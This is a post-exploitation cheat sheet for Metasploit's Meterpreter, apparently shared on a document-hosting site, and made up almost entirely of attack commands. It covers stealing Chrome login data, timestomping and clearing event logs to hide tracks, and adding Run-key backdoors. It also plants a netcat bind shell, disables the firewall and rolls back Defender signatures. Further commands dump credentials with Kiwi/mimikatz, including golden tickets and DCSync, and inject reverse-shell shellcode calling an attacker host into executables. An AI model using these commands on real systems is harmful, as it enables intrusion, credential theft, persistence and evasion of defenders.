q-7 Data

The document is a cheat sheet for Meterpreter commands used in post-exploitation activities. It includes usage instructions and options for commands such as 'download', 'upload', 'scraper', 'winenum', and various registry interactions. Additionally, it covers modules for gathering information, managing persistence, and credential retrieval, along with shell commands for system manipulation.

Uploaded by

BotAxr

(*) POST-EXPLOITATION (*)

______ ______ _____ ____ ___ _ _ __ __
/ ___\ \ / / __ )| ____| _ \|_ _| | | | \/ |
| | \ V /| _ \| _| | |_) || || | | | |\/| |
| |___ | | | |_) | |___| _ < | || |_| | | | |
\____| |_| |____/|_____|_| \_\___|\___/|_| |_|
* CheatSheet *

==========================
meterpreter > download -h
==========================
Usage: download [options] src1 src2 src3 ... destination

Downloads remote files and directories to the local machine.

OPTIONS:

-a Enable adaptive download buffer size
-b Set the initial block size for the download
-c Resume getting a partially-downloaded file
-h Help banner
-l Set the limit of retries (0 unlimits)
-r Download recursively
-t Timestamp downloaded files

EXAMPLES:

download 'c:\\users\\pt\\appdata\\local\\google\\chrome\\user data\\default\\login data' .

========================
meterpreter > upload -h
========================
Usage: upload [options] src1 src2 src3 ... destination

Uploads local files and directories to the remote machine.

OPTIONS:

-h Help banner
-r Upload recursively

=============================
meterpreter > run scraper -h
=============================
Scraper -- harvest system info including network shares, registry hives and
password hashes
Info is stored in /home/kali/.msf4/logs/scripts/scraper
USAGE: run scraper
OPTIONS:

-h Help menu.

=============================
meterpreter > run winenum -h
=============================
WinEnum -- Windows local enumeration

Retrieves all kinds of information about the system
including environment variables, network interfaces,
routing, user accounts, and much more. Results are
stored in /home/kali/.msf4/logs/scripts/winenum

OPTIONS:

-c Change Access, Modified and Created times of executables that were run on
the target machine and clear the EventLog
-h Help menu.
-m Migrate the Meterpreter Session from its current process to a new cmd.exe
before doing anything
-r Dump, compress and download entire Registry

=================================
meterpreter > timestomp <file> -h
=================================
Usage: timestomp <file(s)> OPTIONS

OPTIONS:

-a Set the "last accessed" time of the file
-b Set the MACE timestamps so that EnCase shows blanks
-c Set the "creation" time of the file
-e Set the "mft entry modified" time of the file
-f Set the MACE of attributes equal to the supplied file
-h Help banner
-m Set the "last written" time of the file
-r Set the MACE timestamps recursively on a directory
-v Display the UTC MACE values of the file
-z Set all four attributes (MACE) of the file

EXAMPLES:

timestomp <file> -v
timestomp <file> -z '01/01/2000 11:21:11'

=====================
meterpreter > reg -h
=====================
Usage: reg [command] [options]
Interact with the target machine's registry.

OPTIONS:
-d The data to store in the registry value.
-h Help menu.
-k The registry key path (E.g. HKLM\Software\Foo).
-r The remote machine name to connect to (with current process credentials).
-t The registry value type (E.g. REG_SZ).
-v The registry value name (E.g. Stuff).
-w Set KEY_WOW64 flag, valid values [32|64].

COMMANDS:

enumkey Enumerate the supplied registry key [-k <key>]
createkey Create the supplied registry key [-k <key>]
deletekey Delete the supplied registry key [-k <key>]
queryclass Queries the class of the supplied key [-k <key>]
setval Set a registry value [-k <key> -v <val> -d <data>]. Use a binary blob to set binary data with REG_BINARY type (e.g. setval -d ef4ba278)
deleteval Delete the supplied registry value [-k <key> -v <val>]
queryval Queries the data contents of a value [-k <key> -v <val>]

EXAMPLES:

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

The four "reg add" lines below use the syntax of the native Windows reg.exe utility (/v, /t, /d), not the Meterpreter reg command documented above. Note also that the RunServices and RunServicesOnce keys date from Windows 9x/ME and are not processed by NT-based Windows, so entries under them are inert on modern systems.

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -lvp 445 -e cmd.exe'

===============================
meterpreter > run gettelnet -h
===============================
Windows Telnet Server Enabler Meterpreter Script
Usage: gettelnet -u <username> -p <password>

OPTIONS:

-e Enable Telnet Server only.
-f Forward Telnet Connection.
-h Help menu.
-p The Password of the user to add.
-u The Username of the user to add.

EXAMPLES:

run gettelnet -e -u new2 -p 123123134FF

===========================
meterpreter > POST MODULES
===========================
run post/windows/manage/migrate
run post/windows/gather/enum_av
run post/windows/gather/credentials/chrome
run post/windows/gather/enum_chrome
run post/multi/gather/firefox_creds
run post/windows/gather/usb_history
run post/windows/gather/dumplinks
run post/windows/gather/enum_applications
run post/windows/gather/enum_logged_on_users
run post/windows/gather/screen_spy
run windows/manage/rollback_defender_signatures
run post/linux/gather/checkvm

===================
MODULES > EXPLOITS
===================

use exploit/windows/local/persistence_service
use post/windows/manage/persistence_exe
use exploit/windows/local/persistence

===============
Shell Commands
===============

Shutdown Firewall
^^^^^^^^^^^^^^^^^

netsh advfirewall set allprofiles state off
netsh advfirewall firewall add rule name="PortForwarding 80" dir=in action=allow protocol=TCP localport=80

Clearing Events
^^^^^^^^^^^^^^^
cmd.exe /c wevtutil.exe cl System
cmd.exe /c wevtutil.exe cl Security

SSH Keys
^^^^^^^^
ssh-keygen
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
cat ~/.ssh/id_rsa.pub
use post/linux/manage/sshkey_persistence

========================
meterpreter > load kiwi
========================

Kiwi Commands
=============
Command                Description
-------                -----------
creds_all              Retrieve all credentials (parsed)
creds_kerberos         Retrieve Kerberos creds (parsed)
creds_livessp          Retrieve Live SSP creds
creds_msv              Retrieve LM/NTLM creds (parsed)
creds_ssp              Retrieve SSP creds
creds_tspkg            Retrieve TsPkg creds (parsed)
creds_wdigest          Retrieve WDigest creds (parsed)
dcsync                 Retrieve user account information via DCSync (unparsed)
dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create   Create a golden kerberos ticket
kerberos_ticket_list   List all kerberos tickets (unparsed)
kerberos_ticket_purge  Purge any in-use kerberos tickets
kerberos_ticket_use    Use a kerberos ticket
kiwi_cmd               Execute an arbitrary mimikatz command (unparsed)
lsa_dump_sam           Dump LSA SAM (unparsed)
lsa_dump_secrets       Dump LSA secrets (unparsed)
password_change        Change the password/hash of a user
wifi_list              List wifi profiles/creds for the current user
wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)

==============================
meterpreter > load peinjector
==============================
meterpreter > injectpe -h
Usage: injectpe -p < windows/meterpreter/reverse_https > -t < c:\target_file.exe >, -o < lhost=192.168.1.123, lport=4443 >

Inject a shellcode on the target executable.

OPTIONS:

-h Help banner
-o Comma separated list of additional options for payload if needed in 'opt1=val,opt2=val' format.
-p Windows Payload to inject into the target executable.
-t Path of the target executable to be injected

EXAMPLES:

injectpe -p windows/meterpreter/reverse_tcp -t vncviewer.exe -o lhost=192.168.92.141,lport=8989

=======================
Msfconsole > Listeners
=======================

Automating the Attack:

set autorunscript post/windows/manage/migrate
set autorunscript multi_console_command -r /home/kali/file
